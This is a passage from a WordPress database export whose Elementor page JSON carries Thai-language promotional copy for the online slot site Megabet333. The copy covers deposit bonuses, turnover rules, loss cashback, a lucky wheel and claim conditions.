data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1321,163,'_thumbnail_id','53'),(1324,164,'_elementor_edit_mode','builder'),(1325,164,'_elementor_template_type','wp-page'),(1326,164,'_elementor_version','3.32.5'),(1327,164,'_elementor_pro_version','3.32.3'),(1328,164,'_wp_page_template','default'),(1329,164,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1330,164,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 